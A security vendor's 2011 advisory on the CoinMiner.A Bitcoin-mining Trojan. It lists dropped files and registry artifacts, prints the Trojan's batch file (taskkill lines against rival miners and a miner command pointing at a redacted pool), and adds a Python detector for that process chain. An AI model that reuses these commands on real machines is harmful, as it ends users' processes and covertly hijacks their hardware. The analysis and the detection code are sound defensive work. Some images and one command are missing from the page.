New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)
Description
The SonicWALL UTM research team received reports of a new Bitcoin-mining Trojan in the wild. Bitcoin is a decentralized peer-to-peer crypto-currency. Generating (mining) bitcoins is computationally expensive: on a single personal computer it would take an impractical amount of time to produce even one bitcoin. If, however, an attacker compromises a number of machines equipped with fast, highly parallel Graphics Processing Units (GPUs), the stolen compute can become a lucrative source of income. CoinMiner.A is a Trojan built for exactly this purpose.
The Trojan uses the following icon:
The Trojan adds the following files to the filesystem:
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]
hsbca.exe is non-malicious software from NTWind called Hidden Start. It is a legitimate utility for running batch files and other programs without a console window; the Trojan abuses it so that neither the batch file nor the miner it launches is visible to the user. It uses the following icon:
wuT2.exe uses the following icon:
3kal.cmd contains the following data:
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im mamatije.exe
taskkill /f /im mamatije2.exe
taskkill /f /im mamatije3.exe
taskkill /f /im yaaa3.2.exe
taskkill /f /im WinMine.exe
taskkill /f /im mamatije4.exe
mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2
The Trojan adds the following values under the HKEY_CURRENT_USER\Software\WinRAR SFX key. WinRAR self-extracting archives record each directory they extract into under this key, so these values indicate that the dropper is a WinRAR SFX that unpacked its payload into the Temp\acc and Startup folders (value name = value data):
- HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Start Menu\Programs\Startup = "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
- HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Local Settings\Temp\acc = "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"
The Trojan attempts to open the following files:
- C:\Documents and Settings\{USER}\Start menu\Programs\Startup\start.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe
The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command, passing /NOCONSOLE so that no console window is shown:
C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"
The Trojan runs the following command to ensure internet connectivity:
As defined in "3kal.cmd", the Trojan runs taskkill.exe to forcibly terminate (/f) the following processes if they are running. cgminer.exe is a widely used open-source Bitcoin miner, and the mamatijeN.exe names follow the same naming scheme as the dropped mamatije5.exe, so the Trojan is freeing the GPU from other miners (including earlier copies of itself) before starting its own:
- cgminer.exe
- svchoost.exe
- mamatije.exe
- mamatije2.exe
- mamatije3.exe
- yaaa3.2.exe
- WinMine.exe
- mamatije4.exe
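The process chain above (Hidden Start launching a batch file from Temp with /NOCONSOLE, a run of taskkill commands against other miners, and a miner invocation pointing at a pool over JSON-RPC) is easy to pick out of process-creation telemetry once you know what to look for. The following triage helper is an added example, not SonicWALL's own code or tooling. It runs over a constructed list of command lines and a constructed set of HKCU\Software\WinRAR SFX values that mirror the artifacts listed on this page (the pool host is kept redacted exactly as the page shows it, and the user profile path is a placeholder); the function and field names are the example's own.

```python
"""Triage helper for the CoinMiner.A process chain (added example, not SonicWALL code)."""
import re
from urllib.parse import urlparse

# Constructed sample data mirroring the artifacts listed on this page; the
# command lines were written for this example, not captured from the malware.
PROFILE = r"C:\Documents and Settings\user"
SAMPLE_COMMAND_LINES = [
    f'"{PROFILE}\\Local Settings\\Temp\\acc\\hsbca.exe" "/NOCONSOLE {PROFILE}\\Local Settings\\Temp\\acc\\3kal.cmd"',
    "taskkill /f /im cgminer.exe",
    "taskkill /f /im svchoost.exe",
    "taskkill /f /im mamatije4.exe",
    "mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2",
    r'"C:\WINDOWS\system32\notepad.exe" C:\notes.txt',  # benign control line
]
# Value name -> data under HKCU\Software\WinRAR SFX (constructed, one benign entry added).
SAMPLE_SFX_VALUES = {
    f"{PROFILE}\\Start Menu\\Programs\\Startup": f"{PROFILE}\\Start Menu\\Programs\\Startup",
    f"{PROFILE}\\Local Settings\\Temp\\acc": f"{PROFILE}\\Local Settings\\Temp\\acc",
    r"C:\Downloads\tools": r"C:\Downloads\tools",
}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def image_name(path):
    """Lower-cased file name of an image path ('C:\\x\\hsbca.exe' -> 'hsbca.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspect_dir(path):
    """True for paths under a Temp directory or the per-user Startup folder."""
    p = path.lower()
    return "\\temp\\" in p or p.endswith("\\temp") or "\\programs\\startup" in p


def hidden_start_launch(tokens):
    """Detect Hidden Start (hsbca.exe) running a script with /NOCONSOLE."""
    if not tokens or image_name(tokens[0]) != "hsbca.exe":
        return None
    # On this page the whole argument string is one quoted token: "/NOCONSOLE <script path>"
    joined = " ".join(tokens[1:])
    if not joined.upper().startswith("/NOCONSOLE "):
        return None
    script = joined.split(" ", 1)[1]
    return {"script": script, "suspect_dir": is_suspect_dir(script)}


def taskkill_target(tokens):
    """Return the image name a 'taskkill /f /im <name>' line tries to terminate."""
    if not tokens or image_name(tokens[0]) not in ("taskkill", "taskkill.exe"):
        return None
    for i, t in enumerate(tokens[:-1]):
        if t.lower() == "/im":
            return tokens[i + 1].lower()
    return None


def miner_params(tokens):
    """Parse getwork-style miner switches (-o url, -u worker, -p password, -t threads)."""
    opts = {t: tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t in ("-o", "-u", "-p", "-t")}
    if "-o" not in opts:
        return None
    url = urlparse(opts["-o"])
    if url.scheme not in ("http", "https") or not url.hostname:
        return None
    try:
        port = url.port
    except ValueError:
        port = None
    return {
        "image": image_name(tokens[0]),
        "pool_host": url.hostname,
        "pool_port": port,
        "worker": opts.get("-u"),
        "has_password": "-p" in opts,
        "threads": int(opts["-t"]) if opts.get("-t", "").isdigit() else None,
        # 8332 is bitcoind's default JSON-RPC port; a pool URL on it is a strong miner tell.
        "json_rpc_default_port": port == 8332,
    }


def triage(cmdlines, sfx_values):
    """Run every detector over the command lines and the WinRAR SFX registry values."""
    report = {"hidden_start": [], "kill_list": [], "miners": [], "sfx_dirs": []}
    for line in cmdlines:
        toks = tokenize(line)
        for key, result in (("hidden_start", hidden_start_launch(toks)),
                            ("kill_list", taskkill_target(toks)),
                            ("miners", miner_params(toks))):
            if result:
                report[key].append(result)
    # WinRAR SFX stores each extraction directory as a value; extraction into Temp or
    # Startup is exactly what the dropper on this page did.
    report["sfx_dirs"] = [d for d in sfx_values.values() if is_suspect_dir(d)]
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_COMMAND_LINES, SAMPLE_SFX_VALUES), indent=2))
```

On the constructed sample the report lists one Hidden Start launch of a .cmd from Temp, the three terminated miner names, one miner invocation (pool host, port 8332, worker dxstr_miner, two threads) and the two SFX extraction directories, while the benign notepad line and the benign extraction path produce nothing. Feeding it real Sysmon or EDR process-creation command lines is a matter of replacing the sample list.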
Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: CoinMiner.A (Trojan)
- GAV: CoinMiner.A_2 (Trojan)
- GAV: CoinMiner.A_3 (Trojan)